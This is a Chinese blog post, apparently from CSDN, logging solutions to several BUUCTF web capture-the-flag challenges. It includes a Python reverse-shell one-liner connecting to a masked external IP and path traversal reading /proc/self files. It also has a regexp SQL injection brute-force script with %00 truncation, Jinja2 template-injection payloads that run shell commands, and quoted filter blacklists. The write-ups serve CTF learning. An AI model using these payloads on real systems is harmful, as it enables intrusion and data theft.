[BUUCTF]第一天训练日志

最新推荐文章于 2022-12-27 15:01:58 发布
最新推荐文章于 2022-12-27 15:01:58 发布
阅读量418 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45834505/article/details/119237509
版权

文章目录

[网鼎杯 2020 白虎组]PicDown

知识点

  • 文件读取
  • python代码审计
  • 反弹shell
  • 文件描述符
  • /proc/self/目录的意义
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信息是不同的,内容等价于/proc/本进程pid/。进程可以通过访问/proc/self/目录来获取自己的系统信息,而不用每次都获取pid。

WP

看url考虑目录穿越,尝试读这些

/proc/self/environ
/proc/self/cmdline

url=…/…/…/proc/self/cmdline可以读取到python2 app.py,再利用/proc/self/cwd/app.py读取到源文件

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

在no_one_know_the_manager可以进行系统命令执行,尝试python反弹shell

?key=YBb%2FolIX5h4ChHDJYy%2BhypD0MtKjJyIs3fI3Jbma1SY%3D&shell=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("118.***.***.***",39555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

监听端口cat后得到flag。

[HarekazeCTF2019]encode_and_encode

知识点

  • json字符转义

WP

<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

$body = file_get_contents('php://input'); #body获取post数据
$json = json_decode($body, true); #对body变量进行json解码

if (is_valid($body) && isset($json) && isset($json['page'])) {#判断body变量是否有效,json数据要有page
  $page = $json['page'];
  $content = file_get_contents($page); #从page中读出文件名,并读取文件
  if (!$content || !is_valid($content)) {#检查content是否有效,即不能明文传输flag文件,利用php伪协议绕过
    $content = "<p>not found</p>\n";
  }
} else {
  $content = '<p>invalid request</p>';
}

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{&lt;censored&gt;}', $content);#如果查到content里有相关的ctf字样,则用censored替代
echo json_encode(['content' => $content]);#最后将json编码后的content输出

使用php伪协议并进行json编码
payload:

在这里插入图片描述

[b01lers2020]Welcome to Earth

发现页面会自动跳转到/die/,尝试抓包,按照提示最终访问到fight.js
在这里插入图片描述
发现flag数组被打乱了,重新排序:

from itertools import permutations

flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]

item = permutations(flag)
for i in item:
	k = ''.join(list(i))
	if k.startswith('pctf{hey_boys') and k[-1] == '}':
		print(k)

说明:
itertools.permutations():就是返回可迭代对象的所有数学全排列方式
itertools.permutations()
它以任意迭代作为参数,并始终返回生成元组的迭代器。它没有(也不应该)特殊的字符串。要获得字符串列表,您可以自己加入元组:
list(map("".join, itertools.permutations(‘1234’)))

[NCTF2019]SQLi

知识点

看这篇文章

  • regexp正则注入
    regexp用来匹配文本,不区分大小写,可以从头开始一位一位进行爆破
    空格由/**/,or可以用||代替
    payload大致为:
username=\
passwd=||/**/passwd/**/regexp/**/"^a"

由于末尾的单引号并未闭合,所以要用到%00作为一个截断的作用来代替# 和-- -这类注释符

passwd=||/**/passwd/**/regexp/**/"^a";%00&username=\

  • %00注释
    该符号不是MySQL的注释符,但PHP具有%00截断的漏洞,有些函数会把%00当做结束符,也就起到了注释掉后面代码的作用。 (比如文件上传中的00截断漏洞)

  • python输入不可见字符
    在Python脚本中的使用:Python访问浏览器,会进行一次URL编码, 因此参数中的URL编码在服务端并不会解码,#等可打印字符直接在参数中输入字符即可,但不可打印字符如%00就需要进行格式处理。
    可以使用parse.unquote(’%00’),或者chr(0),二者都需要使用.format()进行格式化输出。完整格式.format(parse.unquote(’%00’))或.format(chr(0))。

WP

扫描目录得到提示hint.txt:

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";

If $_POST['passwd'] === admin's password,

Then you will get the flag;

采用Regexp注入对password进行逐位爆破,

import string
import requests
from urllib import parse

passwd = ''
string = string.ascii_lowercase + string.digits + '_'
url = 'http://37be292f-206d-4193-acaf-e1b27935892a.node4.buuoj.cn/index.php'

for n in range(100):
    for m in string:
        data = {
            "username" : "\\",
            "passwd" : "||/**/passwd/**/regexp/**/\"^{}\";{}".format((passwd+m),parse.unquote('%00'))
        }
        res = requests.post(url,data=data)
        if 'welcome' in res.text:
            passwd += m
            print(m)
            break
    if m == '_' and 'welcome' not in res.text:
        break
print(passwd)

获取密码后输入得到flag

[watevrCTF-2019]Cookie Store

发现所给的金额不够得到flag,抓包,修改session处的值使money为500,在右侧session处解码得到flag.
在这里插入图片描述
将编码后的值写在左侧session处,send
在这里插入图片描述

解码:
在这里插入图片描述

BUUCTF [RootersCTF2019] I_<3_Flask

知识点

  • Jinjia2模版注入
  • Arjun参数爆破工具
  • tplmap模版注入工具

WP

猜测是模板注入,利用Arjun工具进行参数爆破
在这里插入图片描述
爆出参数是name
直接SSTL 模板注入

?name={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
?name={{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}
或者
?name={{lipsum.__globals__.os.popen('cat flag.txt').read()}}

也可以用SSTI工具tplmap进行扫描
在这里插入图片描述

Y1seco
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
-----已搬运-------BUUCTF: [网鼎杯 2020 白虎组]PicDown --- proc文件的利用, --- python反弹shell ---- python代码审计
Zero_Adam的博客
03-17 1196
参考自:whoami大佬的 一、自己做: 我自己做的时候,没有想找个文件目录穿越,用那些伪协议,来了个便,然后127.0.0.1的ssrf也尝试 这些都是些啥啊!!! /proc/self/environ /proc/self/cmdline 二、学到的&&不足: 当看到url中有?file= ... 的时候,当然是想到文件包含balabala之类的。同时还可能用PHP伪协议,php://filter啦,或者本地的直接file://,找个file还可以加空格绕过过滤哦,之前有个题做过的,
[BUUCTF][网鼎杯 2020 白虎组]PicDown
cosmoslin的博客
01-24 1041
考点 文件读取 反弹shell 解题 在输入框输入数字会在url后面添加参数,利用该参数来尝试文件读取 获取启动指定进程的完整命令 /proc/self/cmdline 获得 python2 app.py 那么我们再读一下这个文件 /proc/self/cwd/app.py 得到 from flask import Flask, Response from flask import render_template from flask import request import os import u
[网鼎杯 2020 白虎组]PicDown
wuyaowangchuan的博客
03-08 1054
框框里面输入123 可以看到url变成了这样 http://59193e2f-62ad-4629-88b4-86b773d82d4e.node3.buuoj.cn/page?url=123 试试 http://59193e2f-62ad-4629-88b4-86b773d82d4e.node3.buuoj.cn/page?url=../../../../etc/passwd 存在任意文件下载 再猜猜这 http://59193e2f-62ad-4629-88b4-86b773d82d4e.node.
buuoj pyre wp
辰星的博客
10-06 192
给了给pyc文件,反编译之,源码如下: print 'Welcome to Re World!' print 'Your input1 is your flag~' l = len(input1) for i in range(l): num = ((input1[i] + i) % 128 + 128) % 128 code += num for i in range(l - 1): code[i] = code[i] ^ code[i + 1] print code code
BUUCTF逆向前八题
01-24
逆向工程是网络安全和软件开发领域中的一个重要技能,主要用于理解二进制程序的内部工作原理。在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF部分web题目
最新发布
05-06
写题记录
ORACLE第2天
07-28
在“ORACLE第2天”的学习中,我们将深入探讨Oracle数据库管理系统的核心概念和技术。Oracle数据库是全球广泛使用的大型关系型数据库系统,它提供了强大的数据管理、事务处理和高性能的解决方案。这篇博客文章可能是...
[BUUCTF] 集训第七天
Dannie01的博客
10-04 493
[CISCN2019 华北赛区 Day1 Web1]Dropbox 任意文件下载 phar反序列化 知识点 在下载的时候可以通过抓包修改文件名filename=…/…/index.php //class.php <?php error_reporting(0); $dbaddr = "127.0.0.1"; $dbuser = "root"; $dbpass = "root"; $dbname = "dropbox"; $db = new mysqli($dbaddr, $dbuser, $db
BUUCTF:[UTCTF2020]sstv
末初的CSDN博客
11-21 4164
https://buuoj.cn/challenges#[UTCTF2020]sstv attachment.wav Kali安装QSSTV apt-get install qsstv Options->Configuration->Sound勾选From file 然后点击这个小按钮,选择attachment.wav开始解码 flag{6bdfeac1e2baa12d6ac5384cdfd166b0} ...
BUUCTF:[GUET-CTF2019]zips
末初的CSDN博客
04-07 3686
下载下来是attachment.zip里面的222.zip就是第一层解压,爆破密码,我使用ziprekko 222.zip的解压密码是723456 111.zip是伪加密,使用winhex打开,修改如下图 把这里的9修改为偶数,解压得到这两个文件 flag.zip是掩码爆破,先看看setup.sh 执行这段python代码 使用ARCHPR掩码爆破,设置掩码15????????.?...
BUUCTF reverse16-20 WP
mumuzi的博客
03-30 1182
写脚本技术很菜,所以和其他wp相比看起来比较麻烦 笔记是按照当时的题目排序写的,顺序可能有出入 做题是从0开始做起,所以前面部分也会尽可能写的详细一点 只要能记录并且了解到怎么做即可,所以就没有去在意排版 遇到不会的函数尽可能去百度了解 因为前面的题难度不大,所以前面的每道题都没有去查壳,除非有特殊:) 题目:[GWCTF 2019]pyre、[BJDCTF2020]JustRE、rsa、CrackRTF、[ACTF新生赛2020]easyre 16.[GWCTF 2019]pyre 得到的 flag 请包
BUUCTF [BSidesSF2019]table-tennis
qq_51447967的博客
05-06 478
题目分析 下载得到一个`pcapng`的流量包,打开之后分析了一下,在`ICMP`数据包的`data`中可以发现有一些数据,如下 基本都是一些标签,估计是一串HTTP的字符串,使用如下命令取出来 tshark -r attachment.pcapng -T fields -e data |sed '/^ *$/d' > data.txt 提取的都是16进制,然后写个脚本处理一下 file = open("flag.txt","r") str = "" k = 1 for i in file
BUUCTF记录 Misc
CuratorJin的博客
10-11 388
[*CTF2019]otaku 下载得到attachment.zip 通过010editor发现其中flag.zip为伪加密,修改加密位后解压文件 flag.zip中last words.txt提示用明文攻击 打开另一个doc文件,发现文字间格式不一样,可推测其中有坑 其中隐藏的文字即破解压缩包所需的last word.txt 这里面还有个坑就是需要将last word.txt中编码转为gbk编码,否则所得到的CRC32值不一样,无法进行爆破 爆破后得到flag.png 最后还得通过l.
BUUCTF:[RoarCTF2019]黄金6年
末初的CSDN博客
11-03 3434
题目地址:https://buuoj.cn/challenges#[RoarCTF2019]%E9%BB%84%E9%87%916%E5%B9%B4 题目attachment.mp4 使用Kinovea打开 key1:i key2:want key3:play 用Kinovea看的时候并没有发现key4,看了网上的wp之后才发现使用Pr可以发现key4,我没有Pr用网上的图片凑合一下 key4:ctf 完整的key如下 iwantplayctf 使用010 Editor打开atta.
BUUCTF:[SWPU2019]Network
末初的CSDN博客
11-11 2437
https://buuoj.cn/challenges#[SWPU2019]Network TTL隐写 import binascii with open('attachment.txt','r') as fp: a=fp.readlines() p=[] for x in range(len(a)): p.append(int(a[x])) s='' for i in p: if(i==63): b='0
[网鼎杯 2020 白虎组]PicDown(任意文件读取)
qq_62046696的博客
12-27 466
打开界面发现有一个get传参然后,尝试任意文件读取漏洞,/etc/passwd看一下,提示下载了一个jpg图片然后打不开只能用 010查看一下信息 看来是猜对了,然后 如果日记没删掉可以查看历史记录 .bash_history呃呃呃差不到,那就看一下现在的进程python 2的app.py文件,直接读取 源码出来了,解析一下 这一块可以分析一下,我们需要获得SECRET_KEY的值,然后使key等于,最后shell进行命令执行,但是看完以后那个文件被删除了,我们怎么获得呢?后面这个3怎么来的呢,
buuctf misc 另外一个世界
03-16
buuctf misc 另外一个世界是指在计算机安全比赛中,misc类型的题目通常是指一些杂项的题目,它们可能与其他类型的题目不太相似,需要参赛者拥有广泛的知识和技能才能解决。而另外一个世界指的是这道题目的思路和解决...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y1seco

我们都在慢慢进步

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值